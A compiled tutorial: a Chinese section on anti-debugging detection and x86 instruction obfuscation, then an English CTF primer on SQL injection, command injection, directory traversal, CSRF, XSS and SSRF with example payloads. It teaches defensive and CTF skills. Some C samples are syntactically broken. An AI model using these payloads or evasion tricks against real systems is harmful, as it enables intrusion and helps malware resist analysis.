由于调试器中启动的进程与正常启动的进程创建堆的方式有些不同,系统使用 PEB 结构偏移量 0x68 处的一个未公开的位置,来决定如果创建堆结构。如果这个位置上的值为 0x70
,则进程处于调试器中。
示例:
BOOL CheckDebug()
{
int BeingDbg = 0;
__asm
{
mov eax, dword ptr fs:[30h]
mov eax, dword ptr [eax + 68h]
and eax, 0x70
mov BeingDbg, eax
}
return BeingDbg != 0;
}
符号检测
符号检测主要针对一些使用了驱动的调试器或监视器,这类调试器在启动后会创建相应的驱动链接符号,以用于应用层与其驱动的通信。但由于这些符号一般都比较固定,所以就可以通过这些符号来确定是否存在相应的调试软件。
示例:
BOOL CheckDebug()
{
HANDLE hDevice = CreateFileA("\\\\.\\PROCEXP153", GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0);
if (hDevice)
{
return 0;
}
}
窗口检测
窗口检测通过检测当前桌面中是否存在特定的调试窗口来判断是否存在调试器,但不能判断该调试器是否正在调试该程序。
示例:
BOOL CheckDebug()
{
if (FindWindowA("OllyDbg", 0))
{
return 0;
}
return 1;
}
特征码检测
特征码检测枚举当前正在运行的进程,并在进程的内存空间中搜索特定调试器的代码片段。
例如 OllyDbg 有这样一段特征码:
0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
0x4b, 0x00, 0x00, 0x00
示例:
BOOL CheckDebug()
{
BYTE sign[] = {0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
0x4b, 0x00, 0x00, 0x00;}
PROCESSENTRY32 sentry32 = {0};
sentry32.dwSize = sizeof(sentry32);
HANDLE phsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
Process32First(phsnap, &sentry32);
do{
HANDLE hps = OpenProcess(MAXIMUM_ALLOWED, FALSE, sentry32.th32ProcessID);
if (hps != 0)
{
DWORD szReaded = 0;
BYTE signRemote[sizeof(sign)];
ReadProcessMemory(hps, (LPCVOID)0x4f632a, signRemote, sizeof(signRemote), &szReaded);
if (szReaded > 0)
{
if (memcmp(sign, signRemote, sizeof(sign)) == 0)
{
CloseHandle(phsnap);
return 0;
}
}
}
}
sentry32.dwSize = sizeof(sentry32);
}while(Process32Next(phsnap, &sentry32));
行为检测
行为检测是指在程序中通过代码感知程序处于调试时与未处于调试时的各种差异来判断程序是否处于调试状态。例如我们在调试时步过两条指令所花费的时间远远超过 CPU 正常执行花费的时间,于是就可以通过 rdtsc
指令来进行测试。(该指令用于将时间标签计数器读入 EDX:EAX
寄存器)
示例:
BOOL CheckDebug()
{
int BeingDbg = 0;
__asm
{
rdtsc
mov ecx, edx
rdtsc
sub edx, ecx
mov BeingDbg, edx
}
if (BeingDbg > 2)
{
return 0;
}
return 1;
}
断点检测
断点检测是根据调试器设置断点的原理来检测软件代码中是否设置了断点。调试器一般使用两者方法设置代码断点:
- 通过修改代码指令为 INT3(机器码为0xCC)触发软件异常
- 通过硬件调试寄存器设置硬件断点
针对软件断点,检测系统会扫描比较重要的代码区域,看是否存在多余的 INT3 指令。
示例:
BOOL CheckDebug()
{
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS32 pNtHeaders;
PIMAGE_SECTION_HEADER pSectionHeader;
DWORD dwBaseImage = (DWORD)GetModuleHandle(NULL);
pDosHeader = (PIMAGE_DOS_HEADER)dwBaseImage;
pNtHeaders = (PIMAGE_NT_HEADERS32)((DWORD)pDosHeader + pDosHeader->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pNtHeaders + sizeof(pNtHeaders->Signature) + sizeof(IMAGE_FILE_HEADER) +
(WORD)pNtHeaders->FileHeader.SizeOfOptionalHeader);
DWORD dwAddr = pSectionHeader->VirtualAddress + dwBaseImage;
DWORD dwCodeSize = pSectionHeader->SizeOfRawData;
BOOL Found = FALSE;
__asm
{
cld
mov edi,dwAddr
mov ecx,dwCodeSize
mov al,0CCH
repne scasb ; 在EDI指向大小为ECX的缓冲区中搜索AL包含的字节
jnz NotFound
mov Found,1
NotFound:
}
return Found;
}
而对于硬件断点,由于程序工作在保护模式下,无法访问硬件调试断点,所以一般需要构建异常程序来获取 DR 寄存器的值。
示例:
BOOL CheckDebug()
{
CONTEXT context;
HANDLE hThread = GetCurrentThread();
context.ContextFlags = CONTEXT_DEBUG_REGISTERS;
GetThreadContext(hThread, &context);
if (context.Dr0 != 0 || context.Dr1 != 0 || context.Dr2 != 0 || context.Dr3!=0)
{
return 1;
}
return 0;
}
行为占用
行为占用是指在需要保护的程序中,程序自身将一些只能同时有 1 个实例的功能占为己用。比如一般情况下,一个进程只能同时被 1 个调试器调试,那么就可以设计一种模式,将程序以调试方式启动,然后利用系统的调试机制防止被其他调试器调试。
指令混淆
为什么需要指令混淆
软件的安全性严重依赖于代码复杂化后被分析者理解的难度,通过指令混淆,可以将原始的代码指令转换为等价但极其复杂的指令,从而尽可能地提高分析和破解的成本。
常见的混淆方法
代码变形
代码变形是指将单条或多条指令转变为等价的单条或多条其他指令。其中对单条指令的变形叫做局部变形,对多条指令结合起来考虑的变成叫做全局变形。
例如下面这样的一条赋值指令:
mov eax, 12345678h
可以使用下面的组合指令来替代:
push 12345678h
pop eax
更进一步:
pushfd
mov eax, 1234
shl eax, 10
mov ax, 5678
popfd
pushfd
和 popfd
是为了保护 EFLAGS 寄存器不受变形后指令的影响。
继续替换:
pushfd
push 1234
pop eax
shl eax, 10
mov ax 5678
这样的结果就是简单的指令也可能会变成上百上千条指令,大大提高了理解的难度。
再看下面的例子:
jmp {label}
可以变成:
push {label}
ret
而且 IDA 不能识别出这种 label 标签的调用结构。
指令:
call {label}
可以替换成:
push {call指令后面的那个label}
push {label}
ret
指令:
push {op}
可以替换成:
sub esp, 4
mov [esp], {op}
下面我们来看看全局变形。对于下面的代码:
mov eax, ebx
mov ecx, eax
因为两条代码具有关联性,在变形时需要综合考虑,例如下面这样:
mov cx, bx
mov ax, cx
mov ch, bh
mov ah, bh
这种具有关联性的特定使得通过变形后的代码推导变形前的代码更加困难。
花指令
花指令就是在原始指令中插入一些虽然可以被执行但是没有任何作用的指令,它的出现只是为了扰乱分析,不仅是对分析者来说,还是对反汇编器、调试器来说。
来看个例子,原始指令如下:
add eax, ebx
mul ecx
加入花指令之后:
xor esi, 011223344h
add esi, eax
add eax, ebx
mov edx, eax
shl edx, 4
mul ecx
xor esi, ecx
其中使用了源程序不会使用到的 esi 和 edx 寄存器。这就是一种纯粹的垃圾指令。
有的花指令用于干扰反汇编器,例如下面这样:
01003689 50 push eax
0100368A 53 push ebx
加入花指令后:
01003689 50 push eax
0100368A EB 01 jmp short 0100368D
0100368C FF53 6A call dword ptr [ebx+6A]
乍一看似乎很奇怪,其实是加入因为加入了机器码 EB 01 FF
,使得线性分析的反汇编器产生了误判。而在执行时,第二条指令会跳转到正确的位置,流程如下:
01003689 50 push eax
0100368A EB 01 jmp short 0100368D
0100368C 90 nop
0100368D 53 push ebx
扰乱指令序列
指令一般都是按照一定序列执行的,例如下面这样:
01003689 push eax
0100368A push ebx
0100368B xor eax, eax
0100368D cmp eax, 0
01003690 jne short 01003695
01003692 inc eax
01003693 jmp short 0100368D
01003695 pop ebx
01003696 pop eax
指令序列看起来很清晰,所以扰乱指令序列就是要打乱这种指令的排列方式,以干扰分析者:
01003689 push eax
0100368A jmp short 01003694
0100368C xor eax, eax
0100368E jmp short 01003697
01003690 jne short 0100369F
01003692 jmp short 0100369C
01003694 push ebx
01003695 jmp short 0100368C
01003697 cmp eax, 0
0100369A jmp short 01003690
0100369C inc eax
0100369D jmp short 01003697
0100369F pop ebx
010036A0 pop eax
虽然看起来很乱,但真实的执行顺序没有改变。
多分支
多分支是指利用不同的条件跳转指令将程序的执行流程复杂化。与扰乱指令序列不同的时,多分支改变了程序的执行流。举个例子:
01003689 push eax
0100368A push ebx
0100368B push ecx
0100368C push edx
变形如下:
01003689 push eax
0100368A je short 0100368F
0100368C push ebx
0100368D jmp short 01003690
0100368F push ebx
01003690 push ecx
01003691 push edx
代码里加入了一个条件分支,但它究竟会不会触发我们并不关心。于是程序具有了不确定性,需要在执行时才能确定。但可以肯定的时,这段代码的执行结果和原代码相同。
再改进一下,用不同的代码替换分支处的代码:
01003689 push eax
0100368A je short 0100368F
0100368C push ebx
0100368D jmp short 01003693
0100368F push eax
01003690 mov dword ptr [esp], ebx
01003693 push ecx
01003694 push edx
不透明谓词
不透明谓词是指一个表达式的值在执行到某处时,对程序员而言是已知的,但编译器或静态分析器无法推断出这个值,只能在运行时确定。上面的多分支其实也是利用了不透明谓词。
下面的代码中:
mov esi, 1
... ; some code not touching esi
dec esi
...
cmp esi, 0
jz real_code
; fake luggage
real_code:
假设我们知道这里 esi 的值肯定是 0,那么就可以在 fake luggage 处插入任意长度和复杂度的指令,以达到混淆的目的。
其它的例子还有(同样假设esi为0):
add eax, ebx
mul ecx
add eax, esi
间接指针
dummy_data1 db 100h dup (0)
message1 db 'hello world', 0
dummy_data2 db 200h dup (0)
message2 db 'another message', 0
func proc
...
mov eax, offset dummy_data1
add eax, 100h
push eax
call dump_string
...
mov eax, offset dummy_data2
add eax, 200h
push eax
call dump_string
...
func endp
这里通过 dummy_data 来间接地引用 message,但 IDA 就不能正确地分析到对 message 的引用。
代码虚拟化
基于虚拟机的代码保护也可以算是代码混淆技术的一种,是目前各种混淆中保护效果最好的。简单地说,该技术就是通过许多模拟代码来模拟被保护的代码的执行,然后计算出与被保护代码执行时相同的结果。
+------------+
| 头部指令序列 | -------> | 代码虚拟机入口 |
|------------| |
| | | 保存代码现场 |
| | |
| 中间指令序列 | | 模拟执行中间指令序列 |
| | |
| | | 设置新的代码现场 |
|------------| |
| 尾部指令序列 | <------- | 代码虚拟机出口 |
+------------+
当原始指令执行到指令序列的开始处,就转入代码虚拟机的入口。此时需要保存当前线程的上下文信息,然后进入模拟执行阶段,该阶段是代码虚拟机的核心。有两种方案来保证虚拟机代码与原始代码的栈空间使用互不冲突,一种是在堆上开辟开辟新的空间,另一种是继续使用原始代码所使用的栈空间,这两种方案互有优劣,在实际中第二种使用较多。
对于怎样模拟原始代码,同样有两种方案。一种是将原本的指令序列转变为一种具有直接或者间接对应关系的,只有虚拟机才能理解的代码数据。例如用 0
来表示 push
, 1 表示 mov
等。这种直接或间接等价的数据称为 opcode。另一种方案是将原始代码的意义直接转换成新的代码,类似于代码变形,这种方案基于指令语义,所以设计难度非常大。
Web Exploitation
https://ctf101.org/web-exploitation/overview/
Websites all around the world are programmed using various programming languages. While the developer should be aware of specific vulnerabilities in each programming language, there are issues fundamental to the internet that can show up regardless of the chosen language or framework.
These vulnerabilities often show up in CTFs as web security challenges where the user needs to exploit a bug to gain some kind of higher-level privilege.
Common vulnerabilities to see in CTF challenges:
- SQL Injection
- Command Injection
- Directory Traversal
- Cross-Site Request Forgery
- Cross-Site Scripting
- Server-Side Request Forgery
SQL Injection
SQL Injection is a vulnerability where an application takes input from a user and doesn't validate that the user's input doesn't contain additional SQL.
<?php
$username = $_GET['username']; // kchung
$result = mysql_query("SELECT * FROM users WHERE username='$username'");
?>
If we look at the $username variable, we might expect the username parameter to be a real username (e.g. kchung) under normal operation.
But a malicious user might submit a different kind of data. For example, consider if the input was '
?
The application would crash because the resulting SQL query is incorrect.
SELECT * FROM users WHERE username='''
Notice the extra single quote at the end.
With the knowledge that a single quote will cause an error in the application, we can expand a little more on SQL Injection.
What if our input was ' OR 1=1
?
SELECT * FROM users WHERE username='' OR 1=1
1 is indeed equal to 1. This equates to true in SQL. If we reinterpret this the SQL statement is really saying
SELECT * FROM users WHERE username='' OR true
This will return every row in the table because each row that exists must be true.
We can also inject comments and termination characters like --
or /*
or ;
. This allows you to terminate SQL queries after your injected statements. For example '--
is a common SQL injection payload.
SELECT * FROM users WHERE username=''-- '
This payload sets the username parameter to an empty string to break out of the query and then adds a comment (--
) that effectively hides the second single quote.
Using this technique of adding SQL statements to an existing query we can force databases to return data that it was not meant to return.
Command Injection
Command Injection is a vulnerability that allows an attacker to submit system commands to a computer running a website. This happens when the application fails to encode user input that goes into a system shell. It is very common to see this vulnerability when a developer uses the system()
command or its equivalent in the application's programming language.
import os
domain = user_input() # ctf101.org
os.system('ping ' + domain)
The above code when used normally will ping the ctf101.org
domain.
But consider what would happen if the user_input()
function returned different data.
import os
domain = user_input() # ; ls
os.system('ping ' + domain)
Because of the additional semicolon, the os.system()
function is instructed to run two commands.
It looks to the program as:
ping ; ls
The semicolon terminates a command in bash and allows you to put another command after it.
Because the ping
command is being terminated and the ls
command is being added on, the ls
command will be run in addition to the empty ping command!
This is the core concept behind command injection. The ls
command could of course be switched with another command (e.g. wget, curl, bash, etc.)
Command injection is a very common means of privilege escalation within web applications and applications that interface with system commands. Many kinds of home routers take user input and directly append it to a system command. For this reason, many of those home router models are vulnerable to command injection.
Example Payloads
;ls
$(ls)
ls
Directory Traversal
Directory Traversal is a vulnerability where an application takes in user input and uses it in a directory path.
Any kind of path controlled by user input that isn't properly sanitized or properly sandboxed could be vulnerable to directory traversal.
For example, consider an application that allows the user to choose what page to load from a GET parameter.
<?php
$page = $_GET['page']; // index.php
include("/var/www/html/" . $page);
?>
Under normal operation, the page would be index.php
. But what if a malicious user gave in something different?
<?php
$page = $_GET['page']; // ../../../../../../../../etc/passwd
include("/var/www/html/" . $page);
?>
Here the user is submitting ../../../../../../../../etc/passwd
.
This will result in the PHP interpreter leaving the directory that it is coded to look in ('/var/www/html') and instead be forced up to the root folder.
include("/var/www/html/../../../../../../../../etc/passwd");
Ultimately this will become /etc/passwd
because the computer will not go a directory above its top directory.
Thus the application will load the /etc/passwd
file and emit it to the user like so:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
This same concept can be applied to applications where some input is taken from a user and then used to access a file or path or similar. This vulnerability very often can be used to leak sensitive data or extract application source code to find other vulnerabilities.
Cross-Site Request Forgery (CSRF)
A Cross-Site Request Forgery or CSRF Attack pronounced see the surf, is an attack on an authenticated user which uses a state session in order to perform state-changing attacks like a purchase, a transfer of funds, or a change of email address.
The entire premise of CSRF is based on session hijacking, usually by injecting malicious elements within a webpage through a <img>
tag or a <iframe>
where references to external resources are unverified.
Using CSRF
GET
requests are often used by websites to get user input. Say a user signs in to a banking site that assigns their browser a cookie that keeps them logged in. If they transfer some money, the URL that is sent to the server might have the pattern:
http://securibank.com/transfer.do?acct=[RECEPIENT]&amount=[DOLLARS]
Knowing this format, an attacker can send an email with a hyperlink to be clicked on or they can include an image tag of 0 by 0 pixels which will automatically be requested by the browser such as:
<img src="http://securibank.com/transfer.do?acct=[RECEPIENT]&amount=[DOLLARS]" width="0" height="0" border="0">
Cross-Site Scripting (XSS)
Cross-Site Scripting or XSS is a vulnerability where one user of an application can send JavaScript that is executed by the browser of another user of the same application.
This is a vulnerability because JavaScript has a high degree of control over a user's web browser.
For example, JavaScript has the ability to:
- Modify the page (called the DOM)
- Send more HTTP requests
- Access cookies
By combining all of these abilities, XSS can maliciously use JavaScript to extract users' cookies and send them to an attacker-controlled server. XSS can also modify the DOM to phishing users for their passwords. This only scratches the surface of what XSS can be used to do.
XSS is typically broken down into three categories:
- Reflected XSS
- Stored XSS
- DOM XSS
Reflected XSS
Reflected XSS is when an XSS exploit is provided through a URL parameter.
For example:
https://ctf101.org?data=<script>alert(1)</script>
You can see the XSS exploit provided in the data
GET parameter. If the application is vulnerable to reflected XSS, the application will take this data parameter value and inject it into the DOM.
For example:
<html>
<body>
<script>alert(1)</script>
</body>
</html>
Depending on where the exploit gets injected, it may need to be constructed differently.
Also, the exploit payload can change to fit whatever the attacker needs it to do. Whether that is to extract cookies and submit them to an external server, or to simply modify the page to deface it.
One of the deficiencies of reflected XSS however is that it requires the victim to access the vulnerable page from an attacker-controlled resource. Notice that if the data parameter, wasn't provided the exploit wouldn't work.
In many situations, reflected XSS is detected by the browser because it is very simple for a browser to detect malicious XSS payloads in URLs.
Stored XSS
Stored XSS is different from reflected XSS in one key way. In reflected XSS, the exploit is provided through a GET parameter. But in stored XSS, the exploit is provided from the website itself.
Imagine a website that allows users to post comments. If a user can submit an XSS payload as a comment, and then have others view that malicious comment, it would be an example of stored XSS.
The reason is that the website itself is serving up the XSS payload to other users. This makes it very difficult to detect from the browser's perspective and no browser is capable of generically preventing stored XSS from exploiting a user.
DOM XSS
DOM XSS is XSS that is due to the browser itself injecting an XSS payload into the DOM. While the server itself may properly prevent XSS, it's possible that the client-side scripts may accidentally take a payload and insert it into the DOM and cause the payload to trigger.
The server itself is not to blame, but the client-side JavaScript files are causing the issue.
Server Side Request Forgery (SSRF)
Server Side Request Forgery or SSRF is where an attacker is able to cause a web application to send a request that the attacker defines.
For example, say there is a website that lets you take a screenshot of any site on the internet.
Under normal usage, a user might ask it to take a screenshot of a page like Google, or The New York Times. But what if a user does something more nefarious? What if they asked the site to take a picture of http://localhost? Or perhaps tries to access something more useful like http://localhost/server-status?
127.0.0.1 (also known as localhost or loopback) represents the computer itself. Accessing localhost means you are accessing the computer's own internal network. Developers often use localhost as a way to access the services they have running on their own computers.
Depending on what the response from the site is the attacker may be able to gain additional information about what's running on the computer itself.
In addition, the requests originating from the server would come from the server's IP, not the attacker's IP. Because of that, it is possible that the attacker might be able to access internal resources that he wouldn't normally be able to access.
Another usage for SSRF is to create a simple port scanner to scan the internal network looking for internal services.